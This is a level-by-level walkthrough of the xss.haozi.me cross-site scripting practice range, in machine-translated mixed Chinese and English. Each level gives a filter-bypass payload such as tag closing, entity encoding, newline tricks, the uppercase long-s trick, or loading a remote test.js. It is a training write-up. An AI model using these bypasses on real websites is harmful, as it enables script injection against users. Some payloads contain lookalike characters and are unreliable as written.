目录

Online shooting range

0x00

 0x01

 0x02

 0x03

 0x04

0x05

 0x06

0x07

 0x08

 0x09

 0x0A

0x0B

0x0C

 0x0D

 0x0E

 0x0F

0x10

 0x11

 0x12

Online shooting range

alert(1)https://xss.haozi.me/

0x00

There are no restrictions on this level,直接<script>alert(1)<script>就过去了

 0x01

This level is to put our input data into<textarea>标签里面了,但是<textarea>It cannot be executed in the labelJS代码,In addition, there are no other restrictions on symbols, etc,So let's close first<textarea>标签,在写入JS代码

</textarea><script>alert(1)</script>

PS:HTMLThe label has an automatic error correction function,So whether to add it or not<textarea>This code can be executed by closing the following tags

 0x02

This level is to transmit our input data tovalue中,So we need to close the double quotes first,再执行JS代码

aa"  οnclick="alert(1)

 0x03

这一关对（、）、[ 、] 进行了限制,At this time, we can consider using backticks instead of parentheses to executeJS代码,在执行的JSThe code needs to be correct beforevalueDo double-quote closures

aa"  <script>alert`1`</script>

 0x04

这一关对（、）、[ 、] 、`  进行了限制,We can't try to get around it by encoding the parentheses after the backticks

aa"  <img src=1 οnerrοr=alert&#40;1&#41;

0x05

This level will put the input into the comment,And the input comment characters are filtered,使用jsThe second annotation in ：--!>

aa" --!> <img src=1 οnerrοr=alert&#40;1&#41;  It can be bypassed without encoding

 0x06

过滤了js中的点击事件,Execute the function after wrapping it on a new line

 aa" type="image" src=1 onerror     需要换行
=alert(1)

0x07

   过滤了JS中的script等标签,Special symbols like angle brackets are also filtered,htmlThe language is looser-->Incorrect syntax will be completed,Try without the closing tag,不行,Not a pair of angle brackets,所以我们使用<img标签

<img src=1 οnerrοr=alert(1)  A newline is required at the end

 0x08

     The entered content is put in<stype>标签中,<stype>标签中的内容不执行JS,Closure is achieved with a newline<stype>,Newlines also bypass regular expressions

</style      Be sure to wrap the line when the label is not closed
><img src=1 οnerrοr=alert(1)

 0x09

   Regular expressions restrict what must be preceded by http开头,The front label can be closed,Bypass in the middle,并使用//注释后面的内容.

http://www.segmentfault.com"></script><script>alert(1)//

 0x0A

URL格式：@The previous website can be redirected to the following website.所以我们可以先创建一个JS脚本,Then redirect the site to what we wrote ourselvesJS脚本

http://[email protected]/test.js

0x0B

toUpperCase() 方法用于把字符串转换为大写. This question converts our input to uppercase,

利用 <img src=1 οnerrοr=实体编码> 或 <svg/οnlοad=实体编码> 实现绕过

<img src=1 οnerrοr=&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;>

<svg/οnlοad=&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;>

0x0C

Uppercase and lowercase the entered data,且过滤script,可以使用<svg/οnlοad=实体编码绕过> 或<details open οntοggle=实体编码>绕过

<svg/οnlοad=&#97;&#108;&#101;&#114;&#116;(1)>

<details open οntοggle=&#97;&#108;&#101;&#114;&#116;(1)>

 0x0D

This level is filtered/[</"']符号,And put the input into the comment,We need to escape the comment with a newline first,After writing the popup function, you need to wrap the line and comment out the following symbols.

    #换了一行
alert(1)
-->  #Comment out the following single quotes and parentheses

 0x0E

This level restricts letters starting with angle brackets and capitalizes letters,In this case we can use a special symbol  ſ --> Uppercase characters are converted to S,实现绕过

<ſvg/οnlοad=&#97;&#108;&#101;&#114;&#116;(1)>

<ſcript src="http://127.0.0.1/test.js"></ſcript>   #We do this by introducing our ownJS文件实现绕过

 0x0F

This level escapes many symbols,But it can be directly identified,So such encoding restrictions don't have much effect,We only need to comment out the following characters in the previous closed pop-up window.

bbb');alert(1)//

0x10

window.data就是一个全局变量,直接写alert相当于将alert传输到window.data

 0x11

与F关 很类似,Close the front directly,Just comment after it

aa");alert(1)//

 0x12

This level is related to11关相似,But replace the double quotes with \\  ,我们需要加上\ 进行转义

aa\");alert(1)//